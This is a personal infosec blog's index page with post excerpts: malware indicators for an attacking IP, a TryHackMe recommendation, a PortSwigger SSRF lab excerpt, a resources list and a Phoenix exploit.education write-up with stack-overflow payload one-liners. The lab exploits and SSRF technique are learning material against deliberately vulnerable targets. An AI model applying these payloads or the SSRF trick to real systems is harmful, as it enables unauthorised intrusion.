infosec – unordnung.net / TL Bioinformatics Blog

fresh #malware i found trying to #pwn me

5.08.20255.08.2025 by bunthut

141.98.11.20 #IOCfresh #malware i found trying to #pwn me https://malshare.com/sample.php?action=detail&hash=188bf96a5b005b55ee60acff4293a4d298d5a50451677e07a30b5a337a8d6bbb https://www.virustotal.com/gui/file/1a52c3a1d2264b958648ec9b12320c182b4ebfbc30fc5ff9f4cda53c4e689f6c/detection KasperskyHEUR:Trojan-Downloader.Linux.Mirai.dSangfor Engine ZeroSuspicious.Linux.Save.a https://www.shodan.io/host/141.98.11.20https://ipinfo.io/141.98.11.20?lookup_source=search-bar

Wanna learn? tryhackme.com.

28.07.2020 by bunthut

I recently discovered tryhackme.com and I am so stunned by the awesome material. You won’t need any other site to learn pentesting anymore and it’s mostly free. It’s FULL of vulnerably boxes you scan spin up in the cloud privately with and without walkthroughs. Pure awesomeness…

Learning SSRF with Portswigger Labs

29.01.2020 by bunthut

Basic SSRF against the local Server https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost When accessing a product page an check stock link checks the stock through an API on some URL. We just need to change the url to localhost/admin where we can see user delete links and here we go with the request to delete that carlos: POST /product/stock HTTP/1.1 … Read moreLearning SSRF with Portswigger Labs

The Big and Dandy "How to get into Infosec" Resources Post 2020

22.01.2020 by bunthut

On a daily basis and on all hacking oriented communities, people ask how to start or to get into Infosec. I decided to maintain a post where I collect my ressources regarding (beginner) learning ressources. I am learning towards an infosec position for a while now and I am now a junior pentester at a … Read moreThe Big and Dandy "How to get into Infosec" Resources Post 2020

WriteUp: Phoenix Exploit.Education

11.01.2020 by bunthut

Writeup for the Phoenix VM from http://exploit.education/phoenix/. stack-onepython -c ‘print 64*”A”‘ stack-twoexport ExploitEducation=$”cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\n\t\n\r” learned about endianess here. really missing some of the basic computer science stuff, but well coming to it… stack-threeuser@phoenix-amd64:/opt/phoenix/amd64$ objdump stack-three -x | grep level user@phoenix-amd64:/opt/phoenix/amd64$ python -c ‘print “c”*64+”\x9d\x06@”‘ | ./stack-three Welcome to phoenix/stack-three, brought to you by https://exploit.education calling function … Read moreWriteUp: Phoenix Exploit.Education